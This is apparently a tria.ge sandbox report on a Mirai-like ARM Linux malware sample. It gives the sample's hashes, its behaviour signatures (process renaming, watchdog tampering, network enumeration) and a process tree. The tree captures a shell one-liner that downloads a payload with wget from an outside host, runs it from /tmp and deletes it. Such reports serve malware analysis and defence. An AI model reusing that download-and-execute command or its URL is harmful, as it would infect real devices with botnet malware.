Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
140s -
platform
debian-9_armhf -
resource
debian9-armhf-20231215-en -
resource tags
arch:armhfimage:debian9-armhf-20231215-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
19/02/2024, 09:49
Behavioral task
behavioral1
Sample
4d21edf2f074bb83a118e4321c912922.elf
Resource
debian9-armhf-20231215-en
General
-
Target
4d21edf2f074bb83a118e4321c912922.elf
-
Size
127KB
-
MD5
4d21edf2f074bb83a118e4321c912922
-
SHA1
7816908c6cf7c4c105338a097a84578602396f7b
-
SHA256
19936aea14ea5d32bf54625c3a2e6d735e24b866ff33f76d3d654620ecb2f0fa
-
SHA512
1da50741de1b474fa6e77cfc488976f9558650a4ff0be7a089dfb86138daabfa89f97b786b842418049b8a26ed95fbf7b52c04543c736939656d898d7590335a
-
SSDEEP
3072:+DShVLkDZ6waCAdclEbYJOmP46aQyfPluesNb:VhVeZ6zclEboOmP46aQyfPluesNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 656 4d21edf2f074bb83a118e4321c912922.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 673 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route 4d21edf2f074bb83a118e4321c912922.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route 4d21edf2f074bb83a118e4321c912922.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/4d21edf2f074bb83a118e4321c912922.elf/tmp/4d21edf2f074bb83a118e4321c912922.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:656 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:657
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:661
-
-
/bin/chmodchmod 777 .....3⤵PID:672
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:673
-
-
/bin/sh/bin/sh ./.....3⤵PID:673
-
-
/bin/rmrm -rf .....3⤵PID:675
-
-